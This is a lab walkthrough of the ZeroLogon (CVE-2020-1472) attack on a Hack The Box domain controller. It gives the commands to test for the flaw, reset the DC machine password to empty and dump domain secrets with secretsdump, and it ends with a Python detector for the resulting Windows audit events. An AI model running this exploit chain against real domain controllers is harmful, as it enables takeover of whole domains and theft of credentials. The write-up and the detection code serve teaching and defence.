CVE-2020-1472 - ZeroLogon
Overview
The attack described here takes advantage of flaws in a cryptographic authentication protocol that proves the authenticity and identity of a domain-joined computer to the DC. Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain. (Secura)
WhitePaper
Installation
Firstly, you need the latest version of impacket from here
git clone https://github.com/SecureAuthCorp/impacket.git
Then cd into the folder and execute
pip3 install .
Testing if a DC is vulnerable
Spoiler, they probably are.
First, clone the following repo and install the requirements
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip3 install -r requirements.txt
Running the Check Script
Now that we have the testing script installed, we can check a host to see if it is vulnerable. I will be running this against the Multimaster machine from Hack The Box.
The command is as follows:
python zerologon_tester.py <DC netbios name> <DC-IP>
Bingo! We can see that the host is vulnerable!
Exploiting a Domain Controller
Risks
If you are doing this in a working production environment then you need to make sure you have the hash of the Domain Controller machine account, as this will be needed to reset the host after you have exploited it; otherwise it will no longer be able to communicate with other DCs.
Getting the POC
To get the exploit, clone this git repo and make sure you have impacket installed
git clone https://github.com/dirkjanm/CVE-2020-1472.git
Now we can run the exploit against our vulnerable target machine
python cve-2020-1472-exploit.py <NETBIOS NAME> <DC-IP>
If all was successful you will get a Result: 0
Dumping Domain Secrets with secretsdump.py
Now that we have set the machine password to an empty string, “”, we can DCSync with secretsdump.py to get all the domain secrets.
secretsdump.py -just-dc -no-pass DCHOSTNAME\$@DC-IP
And just like that I’ve owned your whole AD environment, in less than two minutes.
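The defensive counterpart to the chain above, as an added example that is not part of this write-up or of the linked repos: both steps leave Security-log evidence on the DC, the empty-password reset as Event 4742 performed by ANONYMOUS LOGON against a computer account, and the secretsdump DCSync as Event 4662 reads of the replication control-access rights. The field names follow the Windows Security log; the sample records are constructed for the example, and the simplified dict shape is an assumption.

```python
"""Flag the two observable steps of a ZeroLogon + DCSync chain in Security events."""

# Control-access-right GUIDs a DCSync (secretsdump -just-dc) has to be granted.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


def is_computer_account(name):
    # Machine accounts in AD always carry a trailing "$".
    return name.endswith("$")


def find_zerologon_resets(events):
    """Event 4742 (computer account changed) made by ANONYMOUS LOGON against a
    computer account: the exploit resets the DC machine password over an
    unauthenticated Netlogon channel, and that is what the audit record shows."""
    hits = []
    for e in events:
        if e.get("EventID") != 4742:
            continue
        subject = e.get("SubjectUserName", "").upper()
        target = e.get("TargetUserName", "")
        if subject == "ANONYMOUS LOGON" and is_computer_account(target):
            hits.append((target, "computer account changed by ANONYMOUS LOGON"))
    return hits


def find_dcsync(events):
    """Event 4662 whose Properties include a replication right. Do not suppress
    these because the subject is a DC account: after ZeroLogon the attacker
    authenticates as the DC's own machine account (DC01$ in the sample)."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        if any(guid in props for guid in DS_REPLICATION_GUIDS):
            hits.append((e.get("SubjectUserName"), "directory replication read (DCSync)"))
    return hits


# Constructed sample events (not real logs); the second and fourth are benign.
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
     "TargetUserName": "DC01$", "TargetDomainName": "LAB"},
    {"EventID": 4742, "SubjectUserName": "WS17$", "SubjectDomainName": "LAB",
     "TargetUserName": "WS17$", "TargetDomainName": "LAB"},  # routine machine password rotation
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "alice", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # ordinary object read
]

if __name__ == "__main__":
    for hit in find_zerologon_resets(SAMPLE_EVENTS) + find_dcsync(SAMPLE_EVENTS):
        print("ALERT:", *hit)
```

Event 5827/5828 (vulnerable Netlogon secure channel denied), logged by DCs once the August 2020 update is enforcing, is the earlier signal and worth alerting on as well.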
Respect
If you enjoyed the write up or found it useful consider + repping my htb profile linked below: